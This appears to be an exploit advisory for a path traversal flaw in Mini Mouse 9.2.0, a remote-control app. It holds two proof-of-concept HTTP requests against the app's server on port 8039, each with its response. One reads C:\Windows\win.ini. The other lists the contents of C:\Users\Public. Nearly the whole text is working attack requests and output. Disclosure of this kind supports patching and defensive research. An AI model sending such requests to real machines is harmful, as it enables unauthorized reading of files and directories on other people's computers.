# Exploit Title: Mini Mouse 9.2.0 - Path Traversal # Author: gosh # Date: 02-04-2021 # Vendor Homepage: http://yodinfo.com # Software Link: https://imgv.oss-cn-hangzhou.aliyuncs.com/minimouse.msi # Version: 9.2.0 # Tested on: Windows 10 Pro build 19042.662 POC GET /file=C:%5CWindows%5Cwin.ini HTTP/1.1 Host: 192.168.1.111:8039 Content-Type: application/json Connection: keep-alive Accept: */* User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 Content-Length: 0 Accept-Encoding: gzip, deflate {} ....................................................... HTTP/1.1 200 OK Server: bruce_wy/1.0.0 Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS Access-Control-Allow-Headers: Content-Type,Origin,Accept Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true P3P: CP=CAO PSA OUR Content-Type: application/octet-stream Content-Range: bytes 0-0/92 Content-Length : 92 ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 second POC: POST /op=get_file_list HTTP/1.1 Host: 192.168.1.111:8039 Content-Type: application/json Connection: keep-alive Accept: */* User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 Content-Length: 28 Accept-Encoding: gzip, deflate {"path":"C:\\Users\\Public"} ............................................................. HTTP/1.1 200 OK Server: bruce_wy/1.0.0 Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS Access-Control-Allow-Headers: Content-Type,Origin,Accept Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true P3P: CP=CAO PSA OUR Content-Type: application/json Content-Range: bytes 0-0/-1 { "ret_code": 1, "ret_msg": "success", "data": { "list": [{ "path": "C:\\Users\\Public\\AccountPictures", "is_hide": true, "is_floder": true, "name": "AccountPictures", "name_display": "AccountPictures", "file_size": 0, "create_time": 1615677, "update_time": 1615737, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Desktop", "is_hide": true, "is_floder": true, "name": "Desktop", "name_display": "Desktop", "file_size": 0, "create_time": 1575713, "update_time": 1617276, "sys_type": 2 }, { "path": "C:\\Users\\Public\\desktop.ini", "is_hide": true, "is_floder": false, "name": "desktop.ini", "name_display": "desktop", "file_size": 174, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Documents", "is_hide": false, "is_floder": true, "name": "Documents", "name_display": "Documents", "file_size": 0, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Downloads", "is_hide": false, "is_floder": true, "name": "Downloads", "name_display": "Downloads", "file_size": 0, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Libraries", "is_hide": true, "is_floder": true, "name": "Libraries", "name_display": "Libraries", "file_size": 0, "create_time": 1575713, "update_time": 1575714, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Music", "is_hide": false, "is_floder": true, "name": "Music", "name_display": "Music", "file_size": 0, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Pictures", "is_hide": false, "is_floder": true, "name": "Pictures", "name_display": "Pictures", "file_size": 0, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Videos", "is_hide": false, "is_floder": true, "name": "Videos", "name_display": "Videos", "file_size": 0, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }] } }